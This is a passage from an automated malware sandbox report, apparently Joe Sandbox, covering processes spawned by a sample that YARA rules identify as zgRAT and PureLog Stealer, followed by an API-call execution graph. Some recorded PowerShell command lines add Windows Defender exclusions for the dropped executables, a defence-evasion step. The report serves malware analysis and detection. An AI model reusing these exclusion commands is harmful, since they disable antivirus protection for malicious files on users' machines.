                                                                        Imagebase:0x7ff788560000
                                                                        File size:452'608 bytes
                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:34
                                                                        Start time:14:42:05
                                                                        Start date:28/12/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff7699e0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:false

                                                                        General

                                                                        Target ID:35
                                                                        Start time:14:42:05
                                                                        Start date:28/12/2024
                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\Documents\My Pictures\AaHCyFZRuOMjGDqdgJ.exe'
                                                                        Imagebase:0x7ff788560000
                                                                        File size:452'608 bytes
                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:36
                                                                        Start time:14:42:05
                                                                        Start date:28/12/2024
                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe'
                                                                        Imagebase:0x7ff788560000
                                                                        File size:452'608 bytes
                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:37
                                                                        Start time:14:42:05
                                                                        Start date:28/12/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff7699e0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:false

                                                                        General

                                                                        Target ID:38
                                                                        Start time:14:42:05
                                                                        Start date:28/12/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff7699e0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:false

                                                                        General

                                                                        Target ID:39
                                                                        Start time:14:42:05
                                                                        Start date:28/12/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff7699e0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:false

                                                                        General

                                                                        Target ID:40
                                                                        Start time:14:42:05
                                                                        Start date:28/12/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff7699e0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:false

                                                                        General

                                                                        Target ID:41
                                                                        Start time:14:42:07
                                                                        Start date:28/12/2024
                                                                        Path:C:\Windows\System32\cmd.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\6XMNLNVLzg.bat"
                                                                        Imagebase:0x7ff730d30000
                                                                        File size:289'792 bytes
                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:42
                                                                        Start time:14:42:07
                                                                        Start date:28/12/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff7699e0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:43
                                                                        Start time:14:42:09
                                                                        Start date:28/12/2024
                                                                        Path:C:\Windows\System32\chcp.com
                                                                        Wow64 process (32bit):false
                                                                        Commandline:chcp 65001
                                                                        Imagebase:0x7ff76d150000
                                                                        File size:14'848 bytes
                                                                        MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:44
                                                                        Start time:14:42:12
                                                                        Start date:28/12/2024
                                                                        Path:C:\Windows\System32\w32tm.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                        Imagebase:0x7ff73ce70000
                                                                        File size:108'032 bytes
                                                                        MD5 hash:81A82132737224D324A3E8DA993E2FB5
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:46
                                                                        Start time:14:42:21
                                                                        Start date:28/12/2024
                                                                        Path:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Program Files (x86)\common files\Microsoft Shared\dasHost.exe"
                                                                        Imagebase:0xed0000
                                                                        File size:2'008'064 bytes
                                                                        MD5 hash:34EAB3FCCF84F6B9ABF20B49DB5FCF6E
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe, Author: Joe Security
                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe, Author: Joe Security
                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe, Author: Joe Security
                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe, Author: Joe Security
                                                                        Antivirus matches:
                                                                        • Detection: 100%, Avira
                                                                        • Detection: 100%, Joe Sandbox ML
                                                                        • Detection: 83%, ReversingLabs
                                                                        Has exited:false

                                                                        General

                                                                        Target ID:47
                                                                        Start time:14:42:23
                                                                        Start date:28/12/2024
                                                                        Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                        Imagebase:0x7ff693ab0000
                                                                        File size:496'640 bytes
                                                                        MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:false

                                                                        General

                                                                        Target ID:50
                                                                        Start time:14:42:32
                                                                        Start date:28/12/2024
                                                                        Path:C:\Windows\System32\svchost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                        Imagebase:0x7ff6eef20000
                                                                        File size:55'320 bytes
                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:false

                                                                        Disassembly

                                                                        Reset < >

                                                                          Execution Graph

                                                                          Execution Coverage:9.5%
                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                          Signature Coverage:9.3%
                                                                          Total number of Nodes:1506
                                                                          Total number of Limit Nodes:42
                                                                          execution_graph 25360 f095f0 80 API calls 25361 f1fd4f 9 API calls 2 library calls 25386 f05ef0 82 API calls 23388 f298f0 23396 f2adaf 23388->23396 23392 f2990c 23393 f29919 23392->23393 23404 f29920 11 API calls 23392->23404 23395 f29904 23405 f2ac98 23396->23405 23399 f2adee TlsAlloc 23400 f2addf 23399->23400 23412 f1fbbc 23400->23412 23402 f298fa 23402->23395 23403 f29869 20 API calls _free 23402->23403 23403->23392 23404->23395 23406 f2acc8 23405->23406 23409 f2acc4 23405->23409 23406->23399 23406->23400 23407 f2ace8 23407->23406 23410 f2acf4 GetProcAddress 23407->23410 23409->23406 23409->23407 23419 f2ad34 23409->23419 23411 f2ad04 _free 23410->23411 23411->23406 23413 f1fbc5 IsProcessorFeaturePresent 23412->23413 23414 f1fbc4 23412->23414 23416 f1fc07 23413->23416 23414->23402 23426 f1fbca SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 23416->23426 23418 f1fcea 23418->23402 23420 f2ad55 LoadLibraryExW 23419->23420 23425 f2ad4a 23419->23425 23421 f2ad72 GetLastError 23420->23421 23422 f2ad8a 23420->23422 23421->23422 23423 f2ad7d LoadLibraryExW 23421->23423 23424 f2ada1 FreeLibrary 23422->23424 23422->23425 23423->23422 23424->23425 23425->23409 23426->23418 23428 f2abf0 23429 f2abfb 23428->23429 23431 f2ac24 23429->23431 23432 f2ac20 23429->23432 23434 f2af0a 23429->23434 23441 f2ac50 DeleteCriticalSection 23431->23441 23435 f2ac98 _free 5 API calls 23434->23435 23436 f2af31 23435->23436 23437 f2af4f InitializeCriticalSectionAndSpinCount 23436->23437 23438 f2af3a 23436->23438 23437->23438 23439 f1fbbc _ValidateLocalCookies 5 API calls 23438->23439 23440 f2af66 23439->23440 23440->23429 23441->23432 25324 f288f0 7 API calls ___scrt_uninitialize_crt 25326 f22cfb 38 API calls 4 library calls 23479 f1b7e0 23480 f1b7ea __EH_prolog 23479->23480 23647 f01316 23480->23647 23483 f1b841 23484 f1b82a 23484->23483 23487 f1b838 23484->23487 23488 f1b89b 23484->23488 23485 f1bf0f 23726 f1d69e 23485->23726 23491 f1b878 23487->23491 23492 f1b83c 23487->23492 23490 f1b92e GetDlgItemTextW 23488->23490 23495 f1b8b1 23488->23495 23490->23491 23498 f1b96b 23490->23498 23491->23483 23499 f1b95f KiUserCallbackDispatcher 23491->23499 23492->23483 23502 f0e617 53 API calls 23492->23502 23493 f1bf38 23496 f1bf41 SendDlgItemMessageW 23493->23496 23497 f1bf52 GetDlgItem SendMessageW 23493->23497 23494 f1bf2a SendMessageW 23494->23493 23501 f0e617 53 API calls 23495->23501 23496->23497 23744 f1a64d GetCurrentDirectoryW 23497->23744 23500 f1b980 GetDlgItem 23498->23500 23645 f1b974 23498->23645 23499->23483 23504 f1b994 SendMessageW SendMessageW 23500->23504 23505 f1b9b7 SetFocus 23500->23505 23506 f1b8ce SetDlgItemTextW 23501->23506 23507 f1b85b 23502->23507 23504->23505 23509 f1b9c7 23505->23509 23526 f1b9e0 23505->23526 23510 f1b8d9 23506->23510 23766 f0124f SHGetMalloc 23507->23766 23508 f1bf82 GetDlgItem 23512 f1bfa5 SetWindowTextW 23508->23512 23513 f1bf9f 23508->23513 23515 f0e617 53 API calls 23509->23515 23510->23483 23520 f1b8e6 GetMessageW 23510->23520 23745 f1abab GetClassNameW 23512->23745 23513->23512 23521 f1b9d1 23515->23521 23516 f1b862 23516->23483 23527 f1c1fc SetDlgItemTextW 23516->23527 23517 f1be55 23518 f0e617 53 API calls 23517->23518 23522 f1be65 SetDlgItemTextW 23518->23522 23520->23483 23524 f1b8fd IsDialogMessageW 23520->23524 23767 f1d4d4 23521->23767 23528 f1be79 23522->23528 23524->23510 23530 f1b90c TranslateMessage DispatchMessageW 23524->23530 23531 f0e617 53 API calls 23526->23531 23527->23483 23533 f0e617 53 API calls 23528->23533 23530->23510 23532 f1ba17 23531->23532 23535 f04092 _swprintf 51 API calls 23532->23535 23564 f1be9c _wcslen 23533->23564 23534 f1bff0 23538 f1c020 23534->23538 23541 f0e617 53 API calls 23534->23541 23540 f1ba29 23535->23540 23536 f1c73f 97 API calls 23536->23534 23537 f1b9d9 23657 f0a0b1 23537->23657 23543 f1c73f 97 API calls 23538->23543 23584 f1c0d8 23538->23584 23545 f1d4d4 16 API calls 23540->23545 23546 f1c003 SetDlgItemTextW 23541->23546 23550 f1c03b 23543->23550 23544 f1c18b 23551 f1c194 EnableWindow 23544->23551 23552 f1c19d 23544->23552 23545->23537 23554 f0e617 53 API calls 23546->23554 23547 f1ba68 GetLastError 23548 f1ba73 23547->23548 23663 f1ac04 SetCurrentDirectoryW 23548->23663 23561 f1c04d 23550->23561 23589 f1c072 23550->23589 23551->23552 23557 f1c1ba 23552->23557 23785 f012d3 GetDlgItem EnableWindow 23552->23785 23553 f1beed 23556 f0e617 53 API calls 23553->23556 23558 f1c017 SetDlgItemTextW 23554->23558 23555 f1ba87 23559 f1ba9e 23555->23559 23560 f1ba90 GetLastError 23555->23560 23556->23483 23565 f1c1e1 23557->23565 23574 f1c1d9 SendMessageW 23557->23574 23558->23538 23567 f1bb11 23559->23567 23570 f1bb20 23559->23570 23575 f1baae GetTickCount 23559->23575 23560->23559 23783 f19ed5 32 API calls 23561->23783 23562 f1c0cb 23566 f1c73f 97 API calls 23562->23566 23564->23553 23577 f0e617 53 API calls 23564->23577 23565->23483 23576 f0e617 53 API calls 23565->23576 23566->23584 23567->23570 23571 f1bd56 23567->23571 23569 f1c1b0 23786 f012d3 GetDlgItem EnableWindow 23569->23786 23578 f1bcfb 23570->23578 23580 f1bcf1 23570->23580 23581 f1bb39 GetModuleFileNameW 23570->23581 23682 f012f1 GetDlgItem ShowWindow 23571->23682 23572 f1c066 23572->23589 23574->23565 23664 f04092 23575->23664 23576->23516 23585 f1bed0 23577->23585 23588 f0e617 53 API calls 23578->23588 23579 f1c169 23784 f19ed5 32 API calls 23579->23784 23580->23491 23580->23578 23777 f0f28c 82 API calls 23581->23777 23584->23544 23584->23579 23593 f0e617 53 API calls 23584->23593 23592 f04092 _swprintf 51 API calls 23585->23592 23596 f1bd05 23588->23596 23589->23562 23597 f1c73f 97 API calls 23589->23597 23590 f1bd66 23683 f012f1 GetDlgItem ShowWindow 23590->23683 23591 f1bac7 23667 f0966e 23591->23667 23592->23553 23593->23584 23594 f1c188 23594->23544 23595 f1bb5f 23599 f04092 _swprintf 51 API calls 23595->23599 23600 f04092 _swprintf 51 API calls 23596->23600 23601 f1c0a0 23597->23601 23603 f1bb81 CreateFileMappingW 23599->23603 23604 f1bd23 23600->23604 23601->23562 23605 f1c0a9 DialogBoxParamW 23601->23605 23602 f1bd70 23684 f0e617 23602->23684 23608 f1bbe3 GetCommandLineW 23603->23608 23641 f1bc60 __InternalCxxFrameHandler 23603->23641 23618 f0e617 53 API calls 23604->23618 23605->23491 23605->23562 23611 f1bbf4 23608->23611 23610 f1baed 23614 f1baff 23610->23614 23615 f1baf4 GetLastError 23610->23615 23778 f1b425 SHGetMalloc 23611->23778 23612 f1bc6b ShellExecuteExW 23636 f1bc88 23612->23636 23675 f0959a 23614->23675 23615->23614 23621 f1bd3d 23618->23621 23619 f1bd8c SetDlgItemTextW GetDlgItem 23622 f1bdc1 23619->23622 23623 f1bda9 GetWindowLongW SetWindowLongW 23619->23623 23620 f1bc10 23779 f1b425 SHGetMalloc 23620->23779 23689 f1c73f 23622->23689 23623->23622 23626 f1bc1c 23780 f1b425 SHGetMalloc 23626->23780 23628 f1c73f 97 API calls 23631 f1bddd 23628->23631 23630 f1bccb 23630->23580 23634 f1bce1 UnmapViewOfFile CloseHandle 23630->23634 23714 f1da52 23631->23714 23632 f1bc28 23781 f0f3fa 82 API calls 2 library calls 23632->23781 23634->23580 23636->23630 23639 f1bcb7 Sleep 23636->23639 23638 f1bc3f MapViewOfFile 23638->23641 23639->23630 23639->23636 23640 f1c73f 97 API calls 23644 f1be03 23640->23644 23641->23612 23642 f1be2c 23782 f012d3 GetDlgItem EnableWindow 23642->23782 23644->23642 23646 f1c73f 97 API calls 23644->23646 23645->23491 23645->23517 23646->23642 23648 f01378 23647->23648 23649 f0131f 23647->23649 23788 f0e2c1 GetWindowLongW SetWindowLongW 23648->23788 23651 f01385 23649->23651 23787 f0e2e8 62 API calls 2 library calls 23649->23787 23651->23483 23651->23484 23651->23485 23653 f01341 23653->23651 23654 f01354 GetDlgItem 23653->23654 23654->23651 23655 f01364 23654->23655 23655->23651 23656 f0136a SetWindowTextW 23655->23656 23656->23651 23660 f0a0bb 23657->23660 23658 f0a175 23658->23547 23658->23548 23659 f0a14c 23659->23658 23661 f0a2b2 8 API calls 23659->23661 23660->23658 23660->23659 23789 f0a2b2 23660->23789 23661->23658 23663->23555 23827 f04065 23664->23827 23668 f09678 23667->23668 23669 f096d5 CreateFileW 23668->23669 23670 f096c9 23668->23670 23669->23670 23671 f0971f 23670->23671 23672 f0bb03 GetCurrentDirectoryW 23670->23672 23671->23610 23673 f09704 23672->23673 23673->23671 23674 f09708 CreateFileW 23673->23674 23674->23671 23676 f095cf 23675->23676 23677 f095be 23675->23677 23676->23567 23677->23676 23678 f095d1 23677->23678 23679 f095ca 23677->23679 23911 f09620 23678->23911 23906 f0974e 23679->23906 23682->23590 23683->23602 23685 f0e627 23684->23685 23926 f0e648 23685->23926 23688 f012f1 GetDlgItem ShowWindow 23688->23619 23690 f1c749 __EH_prolog 23689->23690 23691 f1bdcf 23690->23691 23949 f1b314 23690->23949 23691->23628 23694 f1b314 ExpandEnvironmentStringsW 23699 f1c780 _wcslen _wcsrchr 23694->23699 23695 f1ca67 SetWindowTextW 23695->23699 23699->23691 23699->23694 23699->23695 23701 f1c855 SetFileAttributesW 23699->23701 23706 f1cc31 GetDlgItem SetWindowTextW SendMessageW 23699->23706 23709 f1cc71 SendMessageW 23699->23709 23953 f11fbb CompareStringW 23699->23953 23954 f1a64d GetCurrentDirectoryW 23699->23954 23956 f0a5d1 6 API calls 23699->23956 23957 f0a55a FindClose 23699->23957 23958 f1b48e 76 API calls 2 library calls 23699->23958 23959 f23e3e 23699->23959 23702 f1c90f GetFileAttributesW 23701->23702 23713 f1c86f _abort _wcslen 23701->23713 23702->23699 23705 f1c921 DeleteFileW 23702->23705 23705->23699 23707 f1c932 23705->23707 23706->23699 23708 f04092 _swprintf 51 API calls 23707->23708 23710 f1c952 GetFileAttributesW 23708->23710 23709->23699 23710->23707 23711 f1c967 MoveFileW 23710->23711 23711->23699 23712 f1c97f MoveFileExW 23711->23712 23712->23699 23713->23699 23713->23702 23955 f0b991 51 API calls 2 library calls 23713->23955 23715 f1da5c __EH_prolog 23714->23715 23983 f10659 23715->23983 23717 f1da8d 23987 f05b3d 23717->23987 23719 f1daab 23991 f07b0d 23719->23991 23723 f1dafe 24007 f07b9e 23723->24007 23725 f1bdee 23725->23640 23727 f1d6a8 23726->23727 24498 f1a5c6 23727->24498 23730 f1d6b5 GetWindow 23731 f1bf15 23730->23731 23734 f1d6d5 23730->23734 23731->23493 23731->23494 23732 f1d6e2 GetClassNameW 24503 f11fbb CompareStringW 23732->24503 23734->23731 23734->23732 23735 f1d706 GetWindowLongW 23734->23735 23736 f1d76a GetWindow 23734->23736 23735->23736 23737 f1d716 SendMessageW 23735->23737 23736->23731 23736->23734 23737->23736 23738 f1d72c GetObjectW 23737->23738 24504 f1a605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23738->24504 23740 f1d743 24505 f1a5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23740->24505 24506 f1a80c 8 API calls 23740->24506 23743 f1d754 SendMessageW DeleteObject 23743->23736 23744->23508 23746 f1abf1 23745->23746 23747 f1abcc 23745->23747 23748 f1abf6 SHAutoComplete 23746->23748 23749 f1abff 23746->23749 24509 f11fbb CompareStringW 23747->24509 23748->23749 23753 f1b093 23749->23753 23751 f1abdf 23751->23746 23752 f1abe3 FindWindowExW 23751->23752 23752->23746 23754 f1b09d __EH_prolog 23753->23754 23755 f013dc 84 API calls 23754->23755 23756 f1b0bf 23755->23756 24510 f01fdc 23756->24510 23759 f1b0d9 23762 f01692 86 API calls 23759->23762 23760 f1b0eb 23761 f019af 128 API calls 23760->23761 23765 f1b10d __InternalCxxFrameHandler ___std_exception_copy 23761->23765 23763 f1b0e4 23762->23763 23763->23534 23763->23536 23764 f01692 86 API calls 23764->23763 23765->23764 23766->23516 24518 f1b568 PeekMessageW 23767->24518 23770 f1d536 SendMessageW SendMessageW 23771 f1d591 SendMessageW SendMessageW SendMessageW 23770->23771 23772 f1d572 23770->23772 23775 f1d5c4 SendMessageW 23771->23775 23776 f1d5e7 SendMessageW 23771->23776 23772->23771 23773 f1d502 23774 f1d50d ShowWindow SendMessageW SendMessageW 23773->23774 23774->23770 23775->23776 23776->23537 23777->23595 23778->23620 23779->23626 23780->23632 23781->23638 23782->23645 23783->23572 23784->23594 23785->23569 23786->23557 23787->23653 23788->23651 23790 f0a2bf 23789->23790 23791 f0a2e3 23790->23791 23793 f0a2d6 CreateDirectoryW 23790->23793 23810 f0a231 23791->23810 23793->23791 23797 f0a316 23793->23797 23795 f0a329 GetLastError 23796 f0a325 23795->23796 23796->23660 23797->23796 23802 f0a4ed 23797->23802 23800 f0a2ff 23800->23795 23801 f0a303 CreateDirectoryW 23800->23801 23801->23795 23801->23797 23817 f1ec50 23802->23817 23805 f0a510 23807 f0bb03 GetCurrentDirectoryW 23805->23807 23806 f0a53d 23806->23796 23808 f0a524 23807->23808 23808->23806 23809 f0a528 SetFileAttributesW 23808->23809 23809->23806 23819 f0a243 23810->23819 23813 f0bb03 23814 f0bb10 _wcslen 23813->23814 23815 f0bbb8 GetCurrentDirectoryW 23814->23815 23816 f0bb39 _wcslen 23814->23816 23815->23816 23816->23800 23818 f0a4fa SetFileAttributesW 23817->23818 23818->23805 23818->23806 23820 f1ec50 23819->23820 23821 f0a250 GetFileAttributesW 23820->23821 23822 f0a261 23821->23822 23823 f0a23a 23821->23823 23824 f0bb03 GetCurrentDirectoryW 23822->23824 23823->23795 23823->23813 23825 f0a275 23824->23825 23825->23823 23826 f0a279 GetFileAttributesW 23825->23826 23826->23823 23828 f0407c __vswprintf_c_l 23827->23828 23831 f25fd4 23828->23831 23834 f24097 23831->23834 23835 f240d7 23834->23835 23836 f240bf 23834->23836 23835->23836 23837 f240df 23835->23837 23851 f291a8 20 API calls _free 23836->23851 23853 f24636 23837->23853 23840 f240c4 23852 f29087 26 API calls ___std_exception_copy 23840->23852 23843 f240cf 23844 f1fbbc _ValidateLocalCookies 5 API calls 23843->23844 23846 f04086 23844->23846 23846->23591 23847 f24167 23862 f249e6 51 API calls 4 library calls 23847->23862 23850 f24172 23863 f246b9 20 API calls _free 23850->23863 23851->23840 23852->23843 23854 f24653 23853->23854 23855 f240ef 23853->23855 23854->23855 23864 f297e5 GetLastError 23854->23864 23861 f24601 20 API calls 2 library calls 23855->23861 23857 f24674 23884 f2993a 38 API calls __cftof 23857->23884 23859 f2468d 23885 f29967 38 API calls __cftof 23859->23885 23861->23847 23862->23850 23863->23843 23865 f29801 23864->23865 23866 f297fb 23864->23866 23870 f29850 SetLastError 23865->23870 23887 f2b136 23865->23887 23886 f2ae5b 11 API calls 2 library calls 23866->23886 23870->23857 23871 f2981b 23894 f28dcc 23871->23894 23874 f29830 23874->23871 23876 f29837 23874->23876 23875 f29821 23877 f2985c SetLastError 23875->23877 23901 f29649 20 API calls _free 23876->23901 23902 f28d24 38 API calls _abort 23877->23902 23879 f29842 23881 f28dcc _free 20 API calls 23879->23881 23883 f29849 23881->23883 23883->23870 23883->23877 23884->23859 23885->23855 23886->23865 23892 f2b143 _free 23887->23892 23888 f2b183 23904 f291a8 20 API calls _free 23888->23904 23889 f2b16e RtlAllocateHeap 23890 f29813 23889->23890 23889->23892 23890->23871 23900 f2aeb1 11 API calls 2 library calls 23890->23900 23892->23888 23892->23889 23903 f27a5e 7 API calls 2 library calls 23892->23903 23895 f28dd7 RtlFreeHeap 23894->23895 23896 f28e00 _free 23894->23896 23895->23896 23897 f28dec 23895->23897 23896->23875 23905 f291a8 20 API calls _free 23897->23905 23899 f28df2 GetLastError 23899->23896 23900->23874 23901->23879 23903->23892 23904->23890 23905->23899 23907 f09781 23906->23907 23908 f09757 23906->23908 23907->23676 23908->23907 23917 f0a1e0 23908->23917 23912 f0962c 23911->23912 23913 f0964a 23911->23913 23912->23913 23915 f09638 CloseHandle 23912->23915 23914 f09669 23913->23914 23925 f06bd5 76 API calls 23913->23925 23914->23676 23915->23913 23918 f1ec50 23917->23918 23919 f0a1ed DeleteFileW 23918->23919 23920 f0a200 23919->23920 23921 f0977f 23919->23921 23922 f0bb03 GetCurrentDirectoryW 23920->23922 23921->23676 23923 f0a214 23922->23923 23923->23921 23924 f0a218 DeleteFileW 23923->23924 23924->23921 23925->23914 23932 f0d9b0 23926->23932 23929 f0e645 SetDlgItemTextW 23929->23688 23930 f0e66b LoadStringW 23930->23929 23931 f0e682 LoadStringW 23930->23931 23931->23929 23937 f0d8ec 23932->23937 23934 f0d9cd 23935 f0d9e2 23934->23935 23945 f0d9f0 26 API calls 23934->23945 23935->23929 23935->23930 23938 f0d904 23937->23938 23944 f0d984 _strncpy 23937->23944 23940 f0d928 23938->23940 23946 f11da7 WideCharToMultiByte 23938->23946 23943 f0d959 23940->23943 23947 f0e5b1 50 API calls __vsnprintf 23940->23947 23948 f26159 26 API calls 3 library calls 23943->23948 23944->23934 23945->23935 23946->23940 23947->23943 23948->23944 23950 f1b31e 23949->23950 23951 f1b3f0 ExpandEnvironmentStringsW 23950->23951 23952 f1b40d 23950->23952 23951->23952 23952->23699 23953->23699 23954->23699 23955->23713 23956->23699 23957->23699 23958->23699 23960 f28e54 23959->23960 23961 f28e61 23960->23961 23962 f28e6c 23960->23962 23972 f28e06 23961->23972 23964 f28e74 23962->23964 23970 f28e7d _free 23962->23970 23967 f28dcc _free 20 API calls 23964->23967 23965 f28e82 23979 f291a8 20 API calls _free 23965->23979 23966 f28ea7 HeapReAlloc 23969 f28e69 23966->23969 23966->23970 23967->23969 23969->23699 23970->23965 23970->23966 23980 f27a5e 7 API calls 2 library calls 23970->23980 23973 f28e44 23972->23973 23977 f28e14 _free 23972->23977 23982 f291a8 20 API calls _free 23973->23982 23974 f28e2f RtlAllocateHeap 23976 f28e42 23974->23976 23974->23977 23976->23969 23977->23973 23977->23974 23981 f27a5e 7 API calls 2 library calls 23977->23981 23979->23969 23980->23970 23981->23977 23982->23976 23984 f10666 _wcslen 23983->23984 24011 f017e9 23984->24011 23986 f1067e 23986->23717 23988 f10659 _wcslen 23987->23988 23989 f017e9 78 API calls 23988->23989 23990 f1067e 23989->23990 23990->23719 23992 f07b17 __EH_prolog 23991->23992 24028 f0ce40 23992->24028 23994 f07b32 24034 f1eb38 23994->24034 23996 f07b5c 24043 f14a76 23996->24043 23999 f07c7d 24000 f07c87 23999->24000 24002 f07cf1 24000->24002 24075 f0a56d 24000->24075 24004 f07d50 24002->24004 24053 f08284 24002->24053 24006 f07d92 24004->24006 24081 f0138b 74 API calls 24004->24081 24006->23723 24008 f07bac 24007->24008 24010 f07bb3 24007->24010 24009 f12297 86 API calls 24008->24009 24009->24010 24012 f017ff 24011->24012 24023 f0185a __InternalCxxFrameHandler 24011->24023 24013 f01828 24012->24013 24024 f06c36 76 API calls __vswprintf_c_l 24012->24024 24015 f01887 24013->24015 24020 f01847 ___std_exception_copy 24013->24020 24017 f23e3e 22 API calls 24015->24017 24016 f0181e 24025 f06ca7 75 API calls 24016->24025 24019 f0188e 24017->24019 24019->24023 24027 f06ca7 75 API calls 24019->24027 24020->24023 24026 f06ca7 75 API calls 24020->24026 24023->23986 24024->24016 24025->24013 24026->24023 24027->24023 24029 f0ce4a __EH_prolog 24028->24029 24030 f1eb38 8 API calls 24029->24030 24031 f0ce8d 24030->24031 24032 f1eb38 8 API calls 24031->24032 24033 f0ceb1 24032->24033 24033->23994 24035 f1eb3d ___std_exception_copy 24034->24035 24036 f1eb57 24035->24036 24039 f1eb59 24035->24039 24049 f27a5e 7 API calls 2 library calls 24035->24049 24036->23996 24038 f1f5c9 24051 f2238d RaiseException 24038->24051 24039->24038 24050 f2238d RaiseException 24039->24050 24042 f1f5e6 24044 f14a80 __EH_prolog 24043->24044 24045 f1eb38 8 API calls 24044->24045 24047 f14a9c 24045->24047 24046 f07b8b 24046->23999 24047->24046 24052 f10e46 80 API calls 24047->24052 24049->24035 24050->24038 24051->24042 